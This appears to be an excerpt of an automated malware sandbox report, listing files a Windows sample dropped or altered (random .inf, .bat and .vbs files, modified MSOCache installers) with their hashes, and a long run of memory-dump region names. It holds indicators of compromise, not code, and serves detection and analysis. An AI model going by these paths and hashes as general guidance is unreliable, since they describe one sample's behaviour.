SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

C:\ProgramData\DmwYMgQc\PKsMQUYQ.inf

MD5 65cf81f0eb0866bd4154d65515ce9124
SHA1 a19c7e255fccd222fc7fe20625710f31fdeb681c
SHA256 6a558ce7022186108c79edebc0bc97925e8e4296d15aa8abe31ea8da93439e1f
SHA512 de0ac6194fd13e01f360482b1a5d5909710274d920ef8fbfe9bd71bad1358b35485d21bbeee9b695b7fd9d647df1e26face6fc6fda2c314a06aa468c5f402f13

memory/1900-130-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Ekgookws.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/1056-137-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\hYgwkYwM\QgAscQoI.inf

MD5 65cf81f0eb0866bd4154d65515ce9124
SHA1 a19c7e255fccd222fc7fe20625710f31fdeb681c
SHA256 6a558ce7022186108c79edebc0bc97925e8e4296d15aa8abe31ea8da93439e1f
SHA512 de0ac6194fd13e01f360482b1a5d5909710274d920ef8fbfe9bd71bad1358b35485d21bbeee9b695b7fd9d647df1e26face6fc6fda2c314a06aa468c5f402f13

C:\Users\Admin\AppData\Local\Temp\ViwcYAMA.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\Users\Admin\AppData\Local\Temp\v4vcmk

MD5 6f90adcbf8a3254558fe0aa75e416573
SHA1 5e5baaa632e90d78297f3c5edb9c592f15c53d4d
SHA256 e69f8ed2ba8b1bf7bccd65052fb89719e1ff5178cf82b95fd302a3ae950811bb
SHA512 0d9b51f0514f7476179f7b57c231fb40aabb79c747f164852130ee35c1b8caa30a2f6d888e4530fe6e22a4098ccc04301890c1da70ef7a0b2d44d681b370564d

memory/572-143-0x0000000000400000-0x000000000043D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BEwwYoEY.bat

MD5 bae1095f340720d965898063fede1273
SHA1 455d8a81818a7e82b1490c949b32fa7ff98d5210
SHA256 ee5e0a414167c2aca961a616274767c4295659517a814d1428248bd53c6e829a
SHA512 4e73a24161114844d0e42c44c73205c4a57fa4169bd16c95fb7e9d6d5fcdf8bd01741541c77570556ac1f5ee260da67a9041f40381b6c6e0601c9de385bdc024

C:\Users\Admin\AppData\Local\Temp\file.vbs

MD5 4afb5c4527091738faf9cd4addf9d34e
SHA1 170ba9d866894c1b109b62649b1893eb90350459
SHA256 59d889a2bf392f4b117340832b4c73425a7fb1de6c2f83a1aaa779d477c7c6cc
SHA512 16d386d9ece30b459fd47ca87da1f67b38d52a8e55f8fd063762cb3b46ae2c10bc6eac7359b0d1ef4c31c1ac8748ae8f62f8816eff0691abdd3304df38e979a5

C:\ProgramData\DmwYMgQc\PKsMQUYQ.inf

MD5 e4594995cd5c9401b436c6170521d9e7
SHA1 574bc4cc39fd802e413e5c581aaf7a356e947aaf
SHA256 d59580b264927dc57f3467aae03eea0d0afd66702bd9311808bc6ec29720e696
SHA512 987180f90169b0ffd546e10db4dfdef098acc232003013373e64bd18de862ad27bbda55092667a1e1f68e3567c2cd07030ec34d432fc5a55df5f88e435dcd918

C:\Users\Admin\hYgwkYwM\QgAscQoI.inf

MD5 e4594995cd5c9401b436c6170521d9e7
SHA1 574bc4cc39fd802e413e5c581aaf7a356e947aaf
SHA256 d59580b264927dc57f3467aae03eea0d0afd66702bd9311808bc6ec29720e696
SHA512 987180f90169b0ffd546e10db4dfdef098acc232003013373e64bd18de862ad27bbda55092667a1e1f68e3567c2cd07030ec34d432fc5a55df5f88e435dcd918

C:\ProgramData\DmwYMgQc\PKsMQUYQ.inf

MD5 ef9c6d3a5a2f5946451ab4e57ae72526
SHA1 6e4c7b217b9d716c7782bf511338505b4258fd6e
SHA256 29962b4f227a5b38accaab943f5adb45617dff7b9a6dbbf01702495f23ae971d
SHA512 638f3004b4dad69ae744fe434b0d47f780e4a1b0808681b579f7c4089ea4cff0ce6d47ef2124b54d3e462855b7641ba2c243185283760438849a831158cc02ad

C:\Users\Admin\hYgwkYwM\QgAscQoI.inf

MD5 ef9c6d3a5a2f5946451ab4e57ae72526
SHA1 6e4c7b217b9d716c7782bf511338505b4258fd6e
SHA256 29962b4f227a5b38accaab943f5adb45617dff7b9a6dbbf01702495f23ae971d
SHA512 638f3004b4dad69ae744fe434b0d47f780e4a1b0808681b579f7c4089ea4cff0ce6d47ef2124b54d3e462855b7641ba2c243185283760438849a831158cc02ad

\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ose.exe

MD5 9d10f99a6712e28f8acd5641e3a7ea6b
SHA1 835e982347db919a681ba12f3891f62152e50f0d
SHA256 70964a0ed9011ea94044e15fa77edd9cf535cc79ed8e03a3721ff007e69595cc
SHA512 2141ee5c07aa3e038360013e3f40969e248bed05022d161b992df61f21934c5574ed9d3094ffd5245f5afd84815b24f80bda30055cf4d374f9c6254e842f6bd5

\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\setup.exe

MD5 4d92f518527353c0db88a70fddcfd390
SHA1 c4baffc19e7d1f0e0ebf73bab86a491c1d152f98
SHA256 97e6f3fc1a9163f10b6502509d55bf75ee893967fb35f318954797e8ab4d4d9c
SHA512 05a8136ccc45ef73cd5c70ee0ef204d9d2b48b950e938494b6d1a61dfba37527c9600382321d1c031dc74e4cf3e16f001ae0f8cd64d76d765f5509ce8dc76452

\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\setup.exe

MD5 4d92f518527353c0db88a70fddcfd390
SHA1 c4baffc19e7d1f0e0ebf73bab86a491c1d152f98
SHA256 97e6f3fc1a9163f10b6502509d55bf75ee893967fb35f318954797e8ab4d4d9c
SHA512 05a8136ccc45ef73cd5c70ee0ef204d9d2b48b950e938494b6d1a61dfba37527c9600382321d1c031dc74e4cf3e16f001ae0f8cd64d76d765f5509ce8dc76452

C:\ProgramData\DmwYMgQc\PKsMQUYQ.inf

MD5 93053928dbf8eb95edecc545df9fb725
SHA1 4b6d0bd54e7d2cf1c9513878e64526c10178b2e2
SHA256 5191da0608d4599c5197c33412f6d8e4cbada58cf5e8288fd2044356073b5ad3
SHA512 c2318e46b1f3f20668b4bb097371be55cc67f5d622dad037cf5cc3a9c0ad5002d3f05d3f36d1eb25af712bec9585a30eea9e8e6fcb6d49d965585fcabc0b5c29

C:\Users\Admin\hYgwkYwM\QgAscQoI.inf

MD5 93053928dbf8eb95edecc545df9fb725
SHA1 4b6d0bd54e7d2cf1c9513878e64526c10178b2e2
SHA256 5191da0608d4599c5197c33412f6d8e4cbada58cf5e8288fd2044356073b5ad3
SHA512 c2318e46b1f3f20668b4bb097371be55cc67f5d622dad037cf5cc3a9c0ad5002d3f05d3f36d1eb25af712bec9585a30eea9e8e6fcb6d49d965585fcabc0b5c29

\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\dwtrig20.exe

MD5 c87e561258f2f8650cef999bf643a731
SHA1 2c64b901284908e8ed59cf9c912f17d45b05e0af
SHA256 a1dfa6639bef3cb4e41175c43730d46a51393942ead826337ca9541ac210c67b
SHA512 dea4833aa712c5823f800f5f5a2adcf241c1b2b6747872f540f5ff9da6795c4ddb73db0912593337083c7c67b91e9eaf1b3d39a34b99980fd5904ba3d7d62f6c

C:\ProgramData\DmwYMgQc\PKsMQUYQ.inf

MD5 f68e57e52dfdc91de4a3ccf12d8e9a93
SHA1 eb75d4c2f6df58f86494c80e641eecc1a9af459e
SHA256 931db786e141419331c5f5a49e9a07a741c5054ea1ad78d6e12bc45d6b1757c3
SHA512 dc38bbdad8d23b9749185df17d8e15e2018bbb2296a64acaf06cc008c9970368fcfd6f02e00fb998bb77e0372c40382aec23cb8984f850ae4759398aaa1c1a6e

C:\Users\Admin\hYgwkYwM\QgAscQoI.inf

MD5 f68e57e52dfdc91de4a3ccf12d8e9a93
SHA1 eb75d4c2f6df58f86494c80e641eecc1a9af459e
SHA256 931db786e141419331c5f5a49e9a07a741c5054ea1ad78d6e12bc45d6b1757c3
SHA512 dc38bbdad8d23b9749185df17d8e15e2018bbb2296a64acaf06cc008c9970368fcfd6f02e00fb998bb77e0372c40382aec23cb8984f850ae4759398aaa1c1a6e

C:\ProgramData\DmwYMgQc\PKsMQUYQ.inf

MD5 0285973649fd89e79992db4a1cfdb8c6
SHA1 994f1c088d3eea9ceea25e32e3b875c4ca949072
SHA256 656d467566182dc899d73ee0580c15ca3006cbe7ebe7487af46a3e07cb65e376
SHA512 6613b2022058608d41d63bc985e4a9dc30394e1e63f6b37c6fe324ca7de763c141a5d5e36228a428747dd201f44107512d2f09fae18e18afe16c9818dcac43b6

C:\Users\Admin\hYgwkYwM\QgAscQoI.inf

MD5 0285973649fd89e79992db4a1cfdb8c6
SHA1 994f1c088d3eea9ceea25e32e3b875c4ca949072
SHA256 656d467566182dc899d73ee0580c15ca3006cbe7ebe7487af46a3e07cb65e376
SHA512 6613b2022058608d41d63bc985e4a9dc30394e1e63f6b37c6fe324ca7de763c141a5d5e36228a428747dd201f44107512d2f09fae18e18afe16c9818dcac43b6

C:\ProgramData\DmwYMgQc\PKsMQUYQ.inf

MD5 456aad962cc8b2a14ec01f214725a1ea
SHA1 bbb33bfd0936ffa2e74e2a4d2bd7cf7ef4bc8697
SHA256 3ff937ac960bc5bf48ae25db0b7606eb95176f37a4dc8193dc683a2ac67b4665
SHA512 d26a5efc36bda25ef3219fa4aa70112d526bb131953f2eb42dccdc629e90bed93a251140511c2f4229c49547040a99218dc34d06cba803b27f705f3816109880

memory/968-163-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1584-165-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1528-169-0x0000000000400000-0x000000000043D000-memory.dmp

memory/856-172-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1956-174-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1224-178-0x0000000000400000-0x000000000043D000-memory.dmp

memory/668-181-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1900-184-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1688-187-0x0000000000400000-0x000000000043D000-memory.dmp

memory/708-190-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1500-193-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1712-196-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1820-198-0x0000000000400000-0x000000000043D000-memory.dmp

memory/440-202-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1276-204-0x0000000000400000-0x000000000043D000-memory.dmp

memory/992-208-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1500-211-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1684-214-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1600-217-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1956-220-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1728-223-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1512-225-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1544-229-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1260-232-0x0000000000400000-0x000000000043D000-memory.dmp

memory/972-235-0x0000000000400000-0x000000000043D000-memory.dmp

memory/736-238-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1764-241-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1968-244-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1544-247-0x0000000000400000-0x000000000043D000-memory.dmp

memory/440-250-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1376-253-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1112-256-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1764-259-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1500-262-0x0000000000400000-0x000000000043D000-memory.dmp

memory/896-265-0x0000000000400000-0x000000000043D000-memory.dmp

memory/440-268-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1012-271-0x0000000000400000-0x000000000043D000-memory.dmp

memory/684-274-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1984-277-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1376-280-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1468-283-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1524-286-0x0000000000400000-0x000000000043D000-memory.dmp

memory/988-289-0x0000000000400000-0x000000000043D000-memory.dmp

memory/736-292-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1528-295-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1684-298-0x0000000000400000-0x000000000043D000-memory.dmp

memory/972-301-0x0000000000400000-0x000000000043D000-memory.dmp

memory/684-304-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1728-307-0x0000000000400000-0x000000000043D000-memory.dmp

memory/1804-310-0x0000000000400000-0x000000000043D000-memory.dmp